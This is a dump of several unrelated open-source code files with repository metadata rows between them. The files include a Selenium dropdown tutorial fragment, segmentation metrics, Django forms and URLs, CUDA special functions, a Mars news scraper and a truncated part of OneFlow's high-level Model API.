print(type(dropdown1)) # dropdown是WebElement类型
# WebElement这个类中,只有click和send_keys这样的方法,没有选择下拉框选项的方法
select1 = Select(dropdown1)
print(type(select1)) # select1是Select类型
# 转换成select类型之后,网页元素还是那个元素,但是Select类中有选择选项的方法
select1.select_by_value("320000") #这时,我们就可以通过选项的值来定位
time.sleep(2)
select1.select_by_visible_text("辽宁省") #也可通过选项的文本信息来定位
# 尝试一下,选择沈阳市
# 因为是动态id,所以不能通过id定位
# 因为class重复,所以我们也不能直接用class定位
# 但是我们可以用find_elements的方法,先找到页面中所有class=add-new-area-select的元素,
# 然后在通过下标的方式选择第n个页面元素,
# 这种方法类似于以前学的javascript方法
dropdown2 = driver.find_elements_by_class_name("add-new-area-select")[1]
Select(dropdown2).select_by_visible_text("沈阳市")
# 自己选一个铁西区
# driver.find_elements_by_class_name("add-new-area-select")[2]等同于下面这句
# tag_name()这个方法,大多数情况都能找到一堆元素,
# 所以 find_element_tag_name()这个方法很少用
# 但是 find_elements_tag_name()[n]这个方法比较常用
dropdown3 = driver.find_elements_by_tag_name("select")[2]
Select(dropdown3).select_by_visible_text("铁西区")
# 点击点击,保存收获人信息
|
[
"51Testing"
] |
51Testing
|
71a6bd882187409a56532f89178daad5194be49b
|
b69e8fd894a6f5d865911c4ec0f0d8b92b2aa6ac
|
/torchtools/meters/vision/utils.py
|
bb0ebf46ae421b97d654ea8b785a79ef42f7d147
|
[
"BSD-3-Clause"
] |
permissive
|
Time1ess/torchtools
|
7338d65de87e0665f7ec90b71cfa439c5bd20201
|
1c48591188827f8a7403162728f86229203354c5
|
refs/heads/master
| 2021-01-23T10:29:14.707874 | 2018-04-30T13:51:03 | 2018-04-30T13:51:03 | 102,616,366 | 20 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,681 |
py
|
#!/usr/bin/env python3
# coding: UTF-8
# Author: David
# Email: [email protected]
# Created: 2017-09-07 21:24
# Last modified: 2017-09-11 14:41
# Filename: utils.py
# Description:
import numpy as np
from PIL import Image
from torchvision import transforms as T
def fast_hist(label_true, label_pred, n_class):
mask = (label_true >= 0) & (label_true < n_class)
hist = np.bincount(
n_class * label_true[mask].astype(int) +
label_pred[mask], minlength=n_class ** 2).reshape(n_class, n_class)
return hist
def label_accuracy_score(label_trues, label_preds, n_class):
"""Returns accuracy score evaluation result.
- overall accuracy
- mean accuracy
- mean IU
- fwavacc
"""
hist = np.zeros((n_class, n_class))
for lt, lp in zip(label_trues, label_preds):
hist += fast_hist(lt.flatten(), lp.flatten(), n_class)
acc = np.diag(hist).sum() / hist.sum()
acc_cls = np.diag(hist) / hist.sum(axis=1)
acc_cls = np.nanmean(acc_cls)
iu = np.diag(hist) / (hist.sum(axis=1) + hist.sum(axis=0) - np.diag(hist))
mean_iu = np.nanmean(iu)
freq = hist.sum(axis=1) / hist.sum()
fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()
return acc, acc_cls, mean_iu, fwavacc
def build_ss_img_tensor(result, palette):
"""
Build a Semantic result image from output with palette.
Parameters:
* result(torch.Tensor): H x W, pixel classification result
* palette(PIL.ImagePalette): Palette
Return:
* img(torch.Tensor): 3 x H x W
"""
img = Image.fromarray(np.uint8(result), mode='P')
img.putpalette(palette)
img = img.convert()
return T.ToTensor()(img)
|
[
"[email protected]"
] | |
82d6814e4d27a3788157089c8a2a263b4363893e
|
afea9757be324c8def68955a12be11d71ce6ad35
|
/willyanealves/stock/forms.py
|
407e6b50c4057c2d0a82a9414ea1c6e7e450cc88
|
[] |
no_license
|
bergpb/willyane-alves
|
c713cac3ec3a68005f3b8145985693d2477ba706
|
8b2b9922ba35bf2043f2345228f03d80dbd01098
|
refs/heads/master
| 2023-02-10T19:57:50.893172 | 2021-01-11T16:17:14 | 2021-01-11T16:17:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 150 |
py
|
from django import forms
from .models import Stock
class StockForm(forms.ModelForm):
class Meta:
model = Stock
fields = '__all__'
|
[
"[email protected]"
] | |
f0df8ddacc4971ea3a805b59733696e807131ade
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4344/codes/1601_820.py
|
db86b249dcf1f032dea7ef1432b9d829cfe91fe5
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 362 |
py
|
#ade de notas de R$ 50
#valor = notas//50
# Valo# Instituto de Computacao - UFAM
# Lab 01 - Ex 10
# 20 / 05 / 2016
VALOR = int(input("Qual o valor do saque? "))
if VALOR>0 and VALOR%2==0:
nota50 = VALOR//50
aux1 = nota50*50
nota10 = (VALOR - aux1)//10
aux2 = nota10*10
nota2 = (VALOR-aux1-aux2)//2
print(nota50)
print(nota10)
print(nota2)
# Quantid
|
[
"[email protected]"
] | |
102768d7be696f42c91dcd129d83ccad74435d56
|
b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1
|
/tensorflow/python/pywrap_tensorflow.py
|
f216bccfdfe37ae2e5ed7e2535ac4c5360a2fd71
|
[
"Apache-2.0"
] |
permissive
|
uve/tensorflow
|
e48cb29f39ed24ee27e81afd1687960682e1fbef
|
e08079463bf43e5963acc41da1f57e95603f8080
|
refs/heads/master
| 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 |
Apache-2.0
| 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null |
UTF-8
|
Python
| false | false | 3,257 |
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""A wrapper for TensorFlow SWIG-generated bindings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ctypes
import sys
import traceback
from tensorflow.python.platform import self_check
# Perform pre-load sanity checks in order to produce a more actionable error
# than we get from an error during SWIG import.
self_check.preload_check()
# pylint: disable=wildcard-import,g-import-not-at-top,unused-import,line-too-long
try:
# This import is expected to fail if there is an explicit shared object
# dependency (with_framework_lib=true), since we do not need RTLD_GLOBAL.
from tensorflow.python import pywrap_dlopen_global_flags
_use_dlopen_global_flags = True
except ImportError:
_use_dlopen_global_flags = False
# On UNIX-based platforms, pywrap_tensorflow is a SWIG-generated
# python library that dynamically loads _pywrap_tensorflow.so.
_can_set_rtld_local = (hasattr(sys, 'getdlopenflags')
and hasattr(sys, 'setdlopenflags'))
if _can_set_rtld_local:
_default_dlopen_flags = sys.getdlopenflags()
try:
if _use_dlopen_global_flags:
pywrap_dlopen_global_flags.set_dlopen_flags()
elif _can_set_rtld_local:
# Ensure RTLD_LOCAL behavior for platforms where it isn't the default
# (macOS). On Linux RTLD_LOCAL is 0, so this does nothing (and would not
# override an RTLD_GLOBAL in _default_dlopen_flags).
sys.setdlopenflags(_default_dlopen_flags | ctypes.RTLD_LOCAL)
from tensorflow.python.pywrap_tensorflow_internal import *
from tensorflow.python.pywrap_tensorflow_internal import __version__
from tensorflow.python.pywrap_tensorflow_internal import __git_version__
from tensorflow.python.pywrap_tensorflow_internal import __compiler_version__
from tensorflow.python.pywrap_tensorflow_internal import __cxx11_abi_flag__
from tensorflow.python.pywrap_tensorflow_internal import __monolithic_build__
if _use_dlopen_global_flags:
pywrap_dlopen_global_flags.reset_dlopen_flags()
elif _can_set_rtld_local:
sys.setdlopenflags(_default_dlopen_flags)
except ImportError:
msg = """%s\n\nFailed to load the native TensorFlow runtime.\n
See https://www.tensorflow.org/install/errors\n
for some common reasons and solutions. Include the entire stack trace
above this error message when asking for help.""" % traceback.format_exc()
raise ImportError(msg)
# pylint: enable=wildcard-import,g-import-not-at-top,unused-import,line-too-long
|
[
"[email protected]"
] | |
d8ff438375b4bdd79ecfba103c5f65afd2bcb714
|
47c4267477aac784a83ac241465263585637781d
|
/fb高频/211.py
|
61dac80b450b518b05bf788a7dc59022fbacf1a3
|
[] |
no_license
|
MengSunS/daily-leetcode
|
af011a66213fabcec792c0f8280a03aa805a56ec
|
22c76118bb46fadd2b137fd1a3d40e20fd7538e5
|
refs/heads/main
| 2023-08-21T21:35:19.250506 | 2021-10-12T00:23:09 | 2021-10-12T00:23:09 | 306,220,531 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,207 |
py
|
class TrieNode():
def __init__(self):
self.children = collections.defaultdict(TrieNode)
self.isWord = False
class WordDictionary:
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = TrieNode()
def addWord(self, word: str) -> None:
node = self.root
for ch in word:
node = node.children[ch]
node.isWord = True
def search(self, word: str) -> bool:
node = self.root
return self.dfs(node, 0, word)
def dfs(self, node, i, word):
if i == len(word):
if node.isWord:
return True
return False
if word[i] == '.':
for n in node.children.values():
if self.dfs(n, i + 1, word):
return True
else:
node = node.children.get(word[i])
if not node:
return False
return self.dfs(node, i + 1, word)
# Your WordDictionary object will be instantiated and called as such:
# obj = WordDictionary()
# obj.addWord(word)
# param_2 = obj.search(word)
|
[
"[email protected]"
] | |
5bc81745f1d0aa833f2ad310a6858f6d862fc629
|
a1711d3ba173bcf39a1c6ea4aa91013501c090c3
|
/0x0B-python-input_output/10-class_to_json.py
|
974b65033cac85098a58c40e61f1c1fb93ac7c38
|
[] |
no_license
|
veeteeran/holbertonschool-higher_level_programming
|
5115a28c5f9979a146b5c0ed6d9a9d64420dcf4b
|
081705945b8a8850bd3b1c416c382637fae79646
|
refs/heads/master
| 2022-12-14T18:25:54.239460 | 2020-09-25T01:09:05 | 2020-09-25T01:09:05 | 259,425,025 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 335 |
py
|
#!/usr/bin/python3
"""Docstring for class_to_json"""
def class_to_json(obj):
"""
Returns the dictionary description with simple data structure
(list, dictionary, string, integer and boolean) for JSON
serialization of an object
Parameter:
obj: instance of a Class
"""
return obj.__dict__
|
[
"[email protected]"
] | |
d4a2405378c3de1290dcd43aef5f65c68b279f6b
|
386a5b505d77c9798aaab78495d0f00c349cf660
|
/Prognos Project/Working/Piyush Jiwane Git/Project/SearchPortal/questionnaireApp/urls.py
|
a954ca7fb967835830274b6c83975983ed14e83b
|
[] |
no_license
|
namratarane20/MachineLearning
|
2da2c87217618d124fd53f607c20641ba44fb0b7
|
b561cc74733b655507242cbbf13ea09a2416b9e2
|
refs/heads/master
| 2023-01-20T18:54:15.662179 | 2020-03-09T14:12:44 | 2020-03-09T14:12:44 | 237,597,461 | 0 | 0 | null | 2023-01-05T12:37:12 | 2020-02-01T10:22:20 |
Python
|
UTF-8
|
Python
| false | false | 1,173 |
py
|
from django.urls import path,re_path
from . import views
#
# urlpatterns = [
# path('', views.userLogin),
# path('mailVerification', views.mailVerification),
# path('searchKeyword', views.searchKeyword),
# path('uploadcsv', views.uploadcsv),
# path('homepage', views.toHomePage),
# path('indexfile', views.indexToElasticsearch)
# ]
urlpatterns = [
path('', views.Home),
path('searchKeyword', views.searchKeyword ,name="searchKeyword"),
path('searchKeyword/<str:recentSearch>', views.recentSearchKeyword, name="recentSearchKeyword"),
path('account/logout/', views.Logout),
path('adminLogin', views.adminLogin),
path('adminMailVerification', views.adminMailVerification),
path('indexQuestionnaireFile', views.indexQuestionnaireFile),
path('indexPoliciesFile', views.indexPoliciesFile),
path('toHomePage', views.toHomePage),
path('addToTags',views.addToTags),
# path('dispalyTagName',views.dispalyTagName),
path('destroyTag', views.destroyTagInformation),
path("/<str:tagname>", views.displayTagInformation, name='displayTagInfo'),
path('displayTagInformation',views.displayTagInformation),
]
|
[
"[email protected]"
] | |
66bd1d94ba94629eca7202be8c0653b0e0efebbb
|
f1cb404ea95f4527ffeaf6a7fe8db9a2a1990f12
|
/scikits/cuda/special.py
|
4a1081fee13facf5d7818ebdbded9cd221c4cb7f
|
[
"BSD-3-Clause"
] |
permissive
|
sequoiar/scikits.cuda
|
c0821502b7dc90d818669e20f2fa1858f1a78e82
|
79b62904a726d45066351c38b4274b1ecc985e47
|
refs/heads/master
| 2020-12-25T07:39:47.594383 | 2011-03-30T14:39:20 | 2011-03-30T14:39:20 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,139 |
py
|
#!/usr/bin/env python
"""
PyCUDA-based special functions.
"""
import os
from string import Template
import pycuda.gpuarray as gpuarray
from pycuda.compiler import SourceModule
import numpy as np
from misc import get_dev_attrs, select_block_grid_sizes, init, get_current_device
# Get installation location of C headers:
from . import install_headers
# Adapted from Cephes library:
sici_mod_template = Template("""
#include "cuSpecialFuncs.h"
#if ${use_double}
#define FLOAT double
#define SICI(x, si, ci) sici(x, si, ci)
#else
#define FLOAT float
#define SICI(x, si, ci) sicif(x, si, ci)
#endif
__global__ void sici_array(FLOAT *x, FLOAT *si,
FLOAT *ci, unsigned int N) {
unsigned int idx = blockIdx.y*blockDim.x*gridDim.x+
blockIdx.x*blockDim.x+threadIdx.x;
FLOAT si_temp, ci_temp;
if (idx < N) {
SICI(x[idx], &si_temp, &ci_temp);
si[idx] = si_temp;
ci[idx] = ci_temp;
}
}
""")
def sici(x_gpu):
"""
Sine/Cosine integral.
Computes the sine and cosine integral of every element in the
input matrix.
Parameters
----------
x_gpu : GPUArray
Input matrix of shape `(m, n)`.
Returns
-------
(si_gpu, ci_gpu) : tuple of GPUArrays
Tuple of GPUarrays containing the sine integrals and cosine
integrals of the entries of `x_gpu`.
Examples
--------
>>> import pycuda.gpuarray as gpuarray
>>> import pycuda.autoinit
>>> import numpy as np
>>> import scipy.special
>>> import special
>>> x = np.array([[1, 2], [3, 4]], np.float32)
>>> x_gpu = gpuarray.to_gpu(x)
>>> (si_gpu, ci_gpu) = sici(x_gpu, pycuda.autoinit.device)
>>> (si, ci) = scipy.special.sici(x)
>>> np.allclose(si, si_gpu.get())
True
>>> np.allclose(ci, ci_gpu.get())
True
"""
if x_gpu.dtype == np.float32:
use_double = 0
elif x_gpu.dtype == np.float64:
use_double = 1
else:
raise ValueError('unsupported type')
# Get block/grid sizes:
dev = get_current_device()
block_dim, grid_dim = select_block_grid_sizes(dev, x_gpu.shape)
# Set this to False when debugging to make sure the compiled kernel is
# not cached:
cache_dir=None
sici_mod = \
SourceModule(sici_mod_template.substitute(use_double=use_double),
cache_dir=cache_dir,
options=["-I", install_headers])
sici_func = sici_mod.get_function("sici_array")
si_gpu = gpuarray.empty_like(x_gpu)
ci_gpu = gpuarray.empty_like(x_gpu)
sici_func(x_gpu, si_gpu, ci_gpu,
np.uint32(x_gpu.size),
block=block_dim,
grid=grid_dim)
return (si_gpu, ci_gpu)
# Adapted from specfun.f in scipy:
e1z_mod_template = Template("""
#include <pycuda/pycuda-complex.hpp>
#define PI 3.1415926535897931
#define EL 0.5772156649015328
#if ${use_double}
#define FLOAT double
#define COMPLEX pycuda::complex<double>
#else
#define FLOAT float
#define COMPLEX pycuda::complex<float>
#endif
__device__ COMPLEX _e1z(COMPLEX z) {
FLOAT x = real(z);
FLOAT a0 = abs(z);
COMPLEX ce1, cr, ct0, kc, ct;
if (a0 == 0.0)
ce1 = COMPLEX(1.0e300, 0.0);
else if ((a0 < 10.0) || (x < 0.0 && a0 < 20.0)) {
ce1 = COMPLEX(1.0, 0.0);
cr = COMPLEX(1.0, 0.0);
for (int k = 1; k <= 150; k++) {
cr = -(cr * FLOAT(k) * z)/COMPLEX((k + 1.0) * (k + 1.0), 0.0);
ce1 = ce1 + cr;
if (abs(cr) <= abs(ce1)*1.0e-15)
break;
}
ce1 = COMPLEX(-EL,0.0)-log(z)+(z*ce1);
} else {
ct0 = COMPLEX(0.0, 0.0);
for (int k = 120; k >= 1; k--) {
kc = COMPLEX(k, 0.0);
ct0 = kc/(COMPLEX(1.0,0.0)+(kc/(z+ct0)));
}
ct = COMPLEX(1.0, 0.0)/(z+ct0);
ce1 = exp(-z)*ct;
if (x <= 0.0 && imag(z) == 0.0)
ce1 = ce1-COMPLEX(0.0, -PI);
}
return ce1;
}
__global__ void e1z(COMPLEX *z, COMPLEX *e,
unsigned int N) {
unsigned int idx = blockIdx.y*blockDim.x*gridDim.x+
blockIdx.x*blockDim.x+threadIdx.x;
if (idx < N)
e[idx] = _e1z(z[idx]);
}
""")
def e1z(z_gpu):
"""
Exponential integral with `n = 1` of complex arguments.
Parameters
----------
x_gpu : GPUArray
Input matrix of shape `(m, n)`.
Returns
-------
e_gpu : GPUArray
GPUarrays containing the exponential integrals of
the entries of `z_gpu`.
Examples
--------
>>> import pycuda.gpuarray as gpuarray
>>> import pycuda.autoinit
>>> import numpy as np
>>> import scipy.special
>>> import special
>>> z = np.asarray(np.random.rand(4, 4)+1j*np.random.rand(4, 4), np.complex64)
>>> z_gpu = gpuarray.to_gpu(z)
>>> e_gpu = e1z(z_gpu, pycuda.autoinit.device)
>>> e_sp = scipy.special.exp1(z)
>>> np.allclose(e_sp, e_gpu.get())
True
"""
if z_gpu.dtype == np.complex64:
use_double = 0
elif z_gpu.dtype == np.complex128:
use_double = 1
else:
raise ValueError('unsupported type')
# Get block/grid sizes; the number of threads per block is limited
# to 256 because the e1z kernel defined above uses too many
# registers to be invoked more threads per block:
dev = get_current_device()
max_threads_per_block = 256
block_dim, grid_dim = select_block_grid_sizes(dev, z_gpu.shape, max_threads_per_block)
# Set this to False when debugging to make sure the compiled kernel is
# not cached:
cache_dir=None
e1z_mod = \
SourceModule(e1z_mod_template.substitute(use_double=use_double),
cache_dir=cache_dir)
e1z_func = e1z_mod.get_function("e1z")
e_gpu = gpuarray.empty_like(z_gpu)
e1z_func(z_gpu, e_gpu,
np.uint32(z_gpu.size),
block=block_dim,
grid=grid_dim)
return e_gpu
if __name__ == "__main__":
import doctest
doctest.testmod()
|
[
"[email protected]"
] | |
9985402449b77dd2fda3edef41399a64fc307d8c
|
146819090fefeaddeadad8d4659919868e893537
|
/cvproject/Lib/site-packages/djmoney/forms/widgets.py
|
c16a5515a4cb635ad1f087126052151d8ddb48fb
|
[
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-newlib-historical",
"OpenSSL",
"bzip2-1.0.6",
"Python-2.0",
"TCL",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
MdReyajuddin/Big-Project-Codes
|
d5ec071bc5efc65ebdd07e757139a8ee67359706
|
79ab22f2f51e29e2ff17f680306877559c719a56
|
refs/heads/master
| 2022-12-01T04:17:39.138523 | 2020-03-17T18:51:40 | 2020-03-17T18:51:40 | 248,046,679 | 0 | 0 |
BSD-3-Clause
| 2022-11-22T04:40:11 | 2020-03-17T18:40:05 |
Python
|
UTF-8
|
Python
| false | false | 874 |
py
|
# -*- coding: utf-8 -*-
from django.forms import MultiWidget, Select, TextInput
from ..settings import CURRENCY_CHOICES
__all__ = ("MoneyWidget",)
class MoneyWidget(MultiWidget):
def __init__(
self,
choices=CURRENCY_CHOICES,
amount_widget=TextInput,
currency_widget=None,
default_currency=None,
*args,
**kwargs
):
self.default_currency = default_currency
if not currency_widget:
currency_widget = Select(choices=choices)
widgets = (amount_widget, currency_widget)
super(MoneyWidget, self).__init__(widgets, *args, **kwargs)
def decompress(self, value):
if value is not None:
if isinstance(value, (list, tuple)):
return value
return [value.amount, value.currency]
return [None, self.default_currency]
|
[
"[email protected]"
] | |
0764bdbf763f0bf71ecedac5f306b8263fc7c589
|
c08b5edb5075e7840e716b0a09006dae0a4d05ac
|
/.history/Missions_to_Mars/scrape_mars_20200812110529.py
|
dad4048c45ed15c13a2ed258346030ab05ae1724
|
[] |
no_license
|
OlgaDlzk/web-scraping-challenge-1
|
06f915eb76c55c9bc37889017dd9af81122dc1a5
|
f99c3436dfb0169595c46dae7733d90e21385cc6
|
refs/heads/master
| 2023-03-18T00:58:37.928024 | 2020-09-22T20:32:47 | 2020-09-22T20:32:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,710 |
py
|
from splinter import Browser
from bs4 import BeautifulSoup as bs
import pandas as pd
import time
import re
# This is for debugging
def savetofile(contents):
file = open('_temporary.txt',"w",encoding="utf-8")
file.write(contents)
file.close()
def scrape():
executable_path = {"executable_path": "chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
# NASA Mars News
url = 'https://mars.nasa.gov/news/'
browser.visit(url)
time.sleep(3)
html = browser.html
soup = bs(html, 'html.parser')
slides = soup.find_all('li', class_='slide')
content_title = slides[0].find('div', class_='content_title')
news_title = content_title.text.strip()
article_teaser_body = slides[0].find('div', class_='article_teaser_body')
news_p = article_teaser_body.text.strip()
# JPL Mars Space Images
base_url = 'https://www.jpl.nasa.gov'
url = base_url + '/spaceimages/?search=&category=Mars'
browser.visit(url)
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
featured_image_url = base_url + soup.find('a',class_='button fancybox')['data-fancybox-href']
# Mars Weather
mars_weather = []
url = 'https://twitter.com/marswxreport?lang=en'
browser.visit(url)
time.sleep(3)
weather_html = browser.html
soup = bs(weather_html, "html.parser")
weather_html = browser.html
soup = bs(weather_html, "html.parser")
# print(weathersoup.prettify())
mars_tweets = [soup.find_all('p', class_="TweetTextSize"), soup.find_all(
'span', class_="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0")]
for tweets in mars_tweets:
mars_tweet = tweets
for tweet in mars_tweet:
if 'InSight' in tweet.text:
mars_weather = tweet.text
if tweet.a in tweet:
mars_weather = mars_weather.strip(tweet.a.text)
break
# Mars facts
url = 'https://space-facts.com/mars/'
browser.visit(url) # not necessary, but added for checking the operation
time.sleep(1)
dfs = pd.read_html(url)
for df in dfs:
try:
df = df.rename(columns={0: "Description", 1: "Value"})
df = df.set_index("Description")
marsfacts_html = df.to_html().replace('\n', '')
# df.to_html('marsfacts.html') # to save to a file to test
break
except:
continue
# Mars Hemispheres
base_url = 'https://astrogeology.usgs.gov'
url = base_url + '/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'
browser.visit(url)
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
items = soup.find_all('div', class_='item')
urls = []
titles = []
for item in items:
urls.append(base_url + item.find('a')['href'])
titles.append(item.find('h3').text.strip())
img_urls = []
for oneurl in urls:
browser.visit(oneurl)
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
oneurl = base_url+soup.find('img',class_='wide-image')['src']
img_urls.append(oneurl)
hemisphere_image_urls = []
for i in range(len(titles)):
hemisphere_image_urls.append({'title':titles[i],'img_url':img_urls[i]})
# Assigning scraped data to a page
marspage = {}
marspage["news_title"] = news_title
marspage["news_p"] = news_p
marspage["featured_image_url"] = featured_image_url
marspage["mars_weather"] = mars_weather
marspage["marsfacts_html"] = marsfacts_html
marspage["hemisphere_image_urls"] = hemisphere_image_urls
return marspage
|
[
"[email protected]"
] | |
9b53596529175476b5038508bbc734c2ba872ed0
|
35aca1291dae461d5562a3b7484e5f659ee80817
|
/oneflow/python/framework/model.py
|
9350023d6d794e8ec5ab4128b1d97683465490ed
|
[
"Apache-2.0"
] |
permissive
|
Flowingsun007/oneflow
|
e6a52cfbf5e82ca4f8b787aa026f40a2f568a10f
|
c1880c011dd453719a28d880abe15e2dab8d0da1
|
refs/heads/master
| 2023-05-11T19:18:59.220269 | 2021-05-28T20:10:35 | 2021-05-28T20:10:35 | 372,195,705 | 0 | 0 |
Apache-2.0
| 2021-06-02T09:46:51 | 2021-05-30T11:24:37 | null |
UTF-8
|
Python
| false | false | 27,327 |
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
__all__ = [
"DataModule",
"NumpyDataModule",
"TrainingConfig",
"ValidationConfig",
"CheckpointConfig",
"Callback",
"Model",
]
from abc import ABC
from typing import Optional, Any, Union, Tuple, List
import inspect
import numpy as np
import oneflow._oneflow_internal
from oneflow.python.framework.check_point_v2 import (
LoadVariables,
SaveVarDict,
GetCheckpoint,
)
from oneflow.python.framework.function_util import api_oneflow_function
from oneflow.python.framework.function_util import FunctionConfig as ExecutionConfig
from oneflow.python.framework.local_blob import LocalBlob
from oneflow.python.framework.session_util import api_clear_default_session
from oneflow.python.framework.tensor import Tensor
from oneflow.python.nn.module import Module
from oneflow.python.oneflow_export import oneflow_export
from oneflow.python.ops.optimizer import Optimizer
from oneflow.python.nn.optimizer.optimizer import Optimizer as OOPOptimizer
import oneflow.python.framework.typing as oneflow_typing
import oneflow.python.framework.dtype as dtype_util
@oneflow_export("model.DataModule")
class DataModule(Module):
def __init__(self, *args, **kwargs):
super().__init__()
def forward(self, step_idx: int = 0, optimizer_idx: int = 0):
# Do nothing, to be overrided by subclass.
pass
def infer_oneflow_data_placeholder(
self, batch: Tuple[Any] = None, optimizer_idx: int = 0
):
return None
@oneflow_export("model.NumpyDataModule")
class NumpyDataModule(DataModule):
def __init__(self, *args, **kwargs):
super().__init__()
def forward(self, step_idx: int = 0, optimizer_idx: int = 0):
# Do nothing, to be overrided by subclass.
pass
def __call__(self, *args):
ret = self.forward(*args)
return ret
def infer_oneflow_data_placeholder(
self, batch: Tuple[np.ndarray, ...] = None, optimizer_idx: int = 0
):
assert isinstance(batch, tuple), "model.NumpyDataModule must return a tuple."
data_placeholder_list = []
for item in batch:
assert isinstance(
item, np.ndarray
), "model.NumpyDataModule must return a tuple of numpy."
of_dtype = dtype_util.convert_numpy_dtype_to_oneflow_dtype(item.dtype)
numpy_placeholder = oneflow_typing.Numpy.Placeholder(
shape=item.shape, dtype=of_dtype
)
data_placeholder_list.append(numpy_placeholder)
return data_placeholder_list
@oneflow_export("model.TrainingConfig")
class TrainingConfig:
def __init__(self):
super().__init__()
self.exe_cfg = ExecutionConfig()
self.data = None
self.error_msg = ""
def config_execution(self, exe_cfg: ExecutionConfig = None):
self.exe_cfg = exe_cfg
def config_data(self, data: DataModule = None):
self.data = data
def check_valid(self):
is_valid = True
self.error_msg = ""
if not isinstance(self.exe_cfg, ExecutionConfig):
self.error_msg += "model.TrainingConfig exe_cfg is not ExecutionConfig;"
is_valid = False
if self.data is None:
self.error_msg += "model.TrainingConfig data is None;"
is_valid = False
if not isinstance(self.data, DataModule):
self.error_msg += "model.TrainingConfig data is not DataModule;"
is_valid = False
return is_valid
@oneflow_export("model.ValidationConfig")
class ValidationConfig:
def __init__(self):
super().__init__()
self.exe_cfg = ExecutionConfig()
self.data = None
self.step_interval = 10
self.error_msg = ""
def config_execution(self, exe_cfg: ExecutionConfig = None):
self.exe_cfg = exe_cfg
def config_data(self, data: DataModule = None):
self.data = data
def config_step_interval(self, step_interval: int = 1):
self.step_interval = step_interval
def check_valid(self):
is_valid = True
self.error_msg = ""
if self.data is None:
self.error_msg += "model.ValidationConfig data is None;"
is_valid = False
if not isinstance(self.data, DataModule):
self.error_msg += "model.ValidationConfig data is not DataModule;"
is_valid = False
if self.step_interval <= 0 or not isinstance(self.step_interval, int):
self.error_msg += (
"model.ValidationConfig step_interval is <= 0 or is not int;"
)
is_valid = False
return is_valid
@oneflow_export("model.CheckpointConfig")
class CheckpointConfig(object):
def __init__(self,):
self.need_load = False
self.load_dirpath = None
self.need_save = False
self.save_dirpath = None
self.save_step_interval = 1
self.error_msg = ""
def config_load(self, dirpath: str = None):
self.need_load = True
assert dirpath is not None, "dirpath should not be None"
self.load_dirpath = dirpath
def config_save(self, dirpath: str = None, step_interval: int = 1):
self.need_save = True
self.save_dirpath = dirpath
assert dirpath is not None, "dirpath should not be None"
self.save_step_interval = step_interval
assert step_interval > 0, "step_interval should not <= 0"
assert isinstance(step_interval, int), "step_interval should be int"
def check_valid(self):
# Configs has already been checked
is_valid = True
self.error_msg = ""
return is_valid
@oneflow_export("model.Callback")
class Callback(ABC):
r""" Abstract base class used to build new callbacks.
"""
def on_training_step_end(
self,
outputs: Optional[
Union[LocalBlob, Tuple[LocalBlob, ...], Tensor, Tuple[Tensor, ...]]
],
step_idx: int = 0,
optimizer_idx: int = 0,
):
# Do nothing, to be overrided by subclass.
pass
def on_validation_step_end(
self,
outputs: Optional[
Union[LocalBlob, Tuple[LocalBlob, ...], Tensor, Tuple[Tensor, ...]]
],
step_idx: int = 0,
):
# Do nothing, to be overrided by subclass.
pass
@oneflow_export("Model", "model.Model")
class Model(
ABC, Module,
):
r"""A high level API for model training and validation.
"""
def __init__(self, *args, **kwargs):
super().__init__()
self._is_deprecated_function_style = (
kwargs["is_deprecated_function_style"]
if "is_deprecated_function_style" in kwargs
else False
)
def forward(self, *args, **kwargs):
r"""Same as `nn.Module.forward()`, here is to define the operations you want to use for prediction.
"""
raise NotImplementedError
def training_step(self, *args, **kwargs):
r"""Operates on a single batch of data from the training set and return loss.
"""
raise NotImplementedError()
